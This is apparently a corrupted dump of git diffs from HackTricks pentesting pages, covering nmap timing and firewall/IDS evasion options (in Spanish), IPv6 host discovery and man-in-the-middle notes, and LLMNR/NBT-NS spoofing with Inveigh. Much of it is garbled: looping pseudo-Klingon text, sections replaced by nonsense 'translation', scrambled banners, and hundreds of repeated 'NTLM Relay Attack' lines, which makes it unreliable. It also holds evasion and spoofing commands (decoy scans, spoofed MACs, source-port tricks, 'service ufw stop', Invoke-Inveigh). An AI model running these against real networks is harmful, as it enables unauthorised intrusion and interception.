blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, v
**--proxies** _**\<Comma-separated list of proxy URLs>**_ **--proxies** _**\<Comma-separated list of proxy URLs>**_
Se puede cambiar con\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Adjust parallel scan group sizes) Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_ **-sP** **-sP**
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_ Para descubrir host en la red en la que estamos por ARP
Podemos modificar el numero de intentos:**--max-retries** _**\<numtries>**_
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**\<time>**_
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
\-T (0-1)
\-T0 --> Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
\-T1 y T2 --> Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
\-T3 --> Funcionamiento por defecto, incluye en paralelo
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
**Firewall/IDS**
No dejan pasar a puertos y analizan paquetes.
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu (con esto, no usar -f), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:\<numero> Para generar \<numero> de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
**-e \<interface>** Para elegir la interfaz
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _Son equivalentes_
**--data** _**\<hex string>**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
**--data-string** _**\<string>**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
**--data-length** _**\<number>**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas (que se generaran aleatoriamente)
Para configurar el paquete IP completamente usar **--ip-options**
If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
**--ttl** _**\<value>**_
**--randomize-hosts** Para que el ataque sea menos obvio
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
**--proxies** _**\<Comma-separated list of proxy URLs>**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
**-sP** Para descubrir host en la red en la que estamos por ARP
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip** Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
**Salidas** **Salidas**
**-oN file** Salida normal **-oN file** **-oN file**
**-oX file** Salida XML Salida normal
**-oS file** Salida de script kidies **-oX file** **-oX file**
**-oG file** Salida grepable Salida XML
**-oA file** Todos menos -oS **-oS file** **-oS file**
**-v level** verbosity Salida de script kidies
**-d level** debugin **-oG file** **-oG file**
**--reason** Porqué del host y estado Salida grepable
**--stats-every time** Cada ese tiempo nos dice como va **-oA file** **-oA file**
**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace Todos menos -oS
**--open** muestra los abiertos, abiertos|filtrados y los no filtrados **-v level** **-v level**
**--resume file** Saca un resumen verbosity
**-d level** **-d level**
debugin
**--reason** **--reason**
Porqué del host y estado
**--stats-every time** **--stats-every time**
Cada ese tiempo nos dice como va
**--packet-trace** **--packet-trace**
Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
**--open** **--open**
muestra los abiertos, abiertos|filtrados y los no filtrados
**--resume file** **--resume file**
Saca un resumen
**Miscelanea** **Miscelanea**
**-6** Permite ipv6 **-6** **-6**
**-A** es lo mismo que -O -sV -sC --traceroute Permite ipv6
**-A** **-A**
es lo mismo que -O -sV -sC --traceroute
**Run time** **Run time**

View file

@ -1,16 +1,14 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a> <strong>qaStaHvIS</strong> <strong>AWS hacking</strong> <strong>ghItlhvam</strong></summary>
Other ways to support HackTricks: <strong>HackTricks</strong> <strong>poH</strong> <strong>support</strong> <strong>ways</strong>:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * <strong>HackTricks</strong> <strong>advertised</strong> <strong>company</strong> <strong>company</strong> <strong>**SUBSCRIPTION PLANS**</strong> <strong>Check</strong> <strong>or</strong> <strong>**download HackTricks in PDF**</strong> <strong>Want</strong> <strong>**HackTricks**</strong> <strong>in</strong> <strong>PDF</strong> <strong>download</strong> <strong>or</strong> <strong>**company advertised in HackTricks**</strong> <strong>see</strong> <strong>**Check the**</strong> [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * <strong>PEASS & HackTricks swag</strong> <strong>official</strong> <strong>Get</strong> <strong>**official PEASS & HackTricks swag**</strong> (https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * <strong>PEASS Family</strong> <strong>The</strong> <strong>Discover</strong> <strong>**The PEASS Family**</strong> (https://opensea.io/collection/the-peass-family) <strong>exclusive NFTs</strong> <strong>collection</strong> <strong>**our collection of exclusive NFTs**</strong> (https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * <strong>group</strong> <strong>Discord</strong> <strong>the</strong> 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) <strong>group</strong> <strong>or</strong> <strong>group</strong> <strong>telegram</strong> <strong>the</strong> [**telegram group**](https://t.me/peass) <strong>us</strong> <strong>**Join the**</strong> 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * <strong>tricks</strong> <strong>hacking</strong> <strong>your</strong> <strong>Share</strong> <strong>**Share your hacking tricks by submitting PRs to the**</strong> [**HackTricks**](https://github.com/carlospolop/hacktricks) <strong>and</strong> [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) <strong>repos</strong> <strong>github</strong> <strong>the</strong> <strong>to</strong> <strong>by</strong> <strong>PRs</strong> <strong>submitting</strong>
</details> </details>
@ -41,7 +39,6 @@ To interact with IPv6 networks, you can use various commands:
- **alive6**: An alternative tool for discovering devices on the same network. - **alive6**: An alternative tool for discovering devices on the same network.
Below are some command examples: Below are some command examples:
```bash ```bash
ping6 I eth0 -c 5 ff02::1 > /dev/null 2>&1 ping6 I eth0 -c 5 ff02::1 > /dev/null 2>&1
ip neigh | grep ^fe80 ip neigh | grep ^fe80
@ -49,9 +46,6 @@ ip neigh | grep ^fe80
# Alternatively, use alive6 for neighbor discovery # Alternatively, use alive6 for neighbor discovery
alive6 eth0 alive6 eth0
``` ```
IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network.
## **Deriving Link-local IPv6 from MAC Address** ## **Deriving Link-local IPv6 from MAC Address**
Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows: Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows:
@ -81,13 +75,11 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP
### Way 2: Using Multicast ### Way 2: Using Multicast
1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network. 1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network.
```bash ```bash
service ufw stop # Stop the firewall service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table ip -6 neigh # Display the neighbor table
``` ```
## IPv6 Man-in-the-Middle (MitM) Attacks ## IPv6 Man-in-the-Middle (MitM) Attacks
Several techniques exist for executing MitM attacks in IPv6 networks, such as: Several techniques exist for executing MitM attacks in IPv6 networks, such as:
@ -97,24 +89,21 @@ Several techniques exist for executing MitM attacks in IPv6 networks, such as:
- Setting up a rogue DHCPv6 server. - Setting up a rogue DHCPv6 server.
# Identifying IPv6 Addresses in the eild # Identifying IPv6 Addresses in the Wild
## Exploring Subdomains ## Exploring Subdomains
A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google: A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google:
```bash ```bash
site:ipv6./ site:ipv6./
``` ```
## DNS tlhIngan Holmey
IPv6 patlh DNS record types cha'logh cha'logh:
- **AXFR**: cha'logh DNS records cha'logh, DNS records cha'logh cha'logh.
- **AAAA**: IPv6 patlh cha'logh.
- **ANY**: DNS records cha'logh cha'logh.
## Utilizing DNS Queries ## Ping6 jatlh
To identify IPv6 addresses, certain DNS record types can be queried: ghaH IPv6 patlh cha'logh cha'logh, `ping6` utility jatlh probing. vaj cha'logh IPv6 patlh cha'logh, responsiveness assessing vaj adjacent IPv6 devices discovering vaj jatlh.
- **AXFR**: Requests a complete zone transfer, potentially uncovering a wide range of DNS records.
- **AAAA**: Directly seeks out IPv6 addresses.
- **ANY**: A broad query that returns all available DNS records.
## Probing with Ping6
After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
## References ## References
@ -135,5 +124,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -18,10 +18,10 @@ Other ways to support HackTricks:
### Local Host Resolution Protocols ### Local Host Resolution Protocols
- **LLMNR, NBT-NS, and mDNS**: - **LLMNR, NBT-NS, and mDNS**:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS. - Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP. - These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols. - [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). - Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Web Proxy Auto-Discovery Protocol (WPAD) ### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically. - WPAD allows browsers to discover proxy settings automatically.
@ -59,27 +59,557 @@ It's crucial to note that employing these techniques should be done legally and
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters). Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh can be operated through PowerShell: Inveigh can be operated through PowerShell:
```powershell ```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
``` ```
Or executed as a C# binary: Or executed as a C# binary:
```
'ejDI'eghDI' 'e' vItlhutlh C# binary:
```
```bash ```bash
Inveigh.exe Inveigh.exe
``` ```
### NTLM Relay Attack ### NTLM Relay Attack
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include: **NTLM Relay Attack**:
- The authenticating user must have Local Admin access on the relayed host. **NTLM Relay Attack**:
- SMB signing should be disabled. **NTLM Relay Attack**:
**NTLM Relay Attack**:
#### 445 Port Forwarding and Tunneling **NTLM Relay Attack**:
**NTLM Relay Attack**:
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading. **NTLM Relay Attack**:
**NTLM Relay Attack**:
PortBender setup and operation in Cobalt Strike: **NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
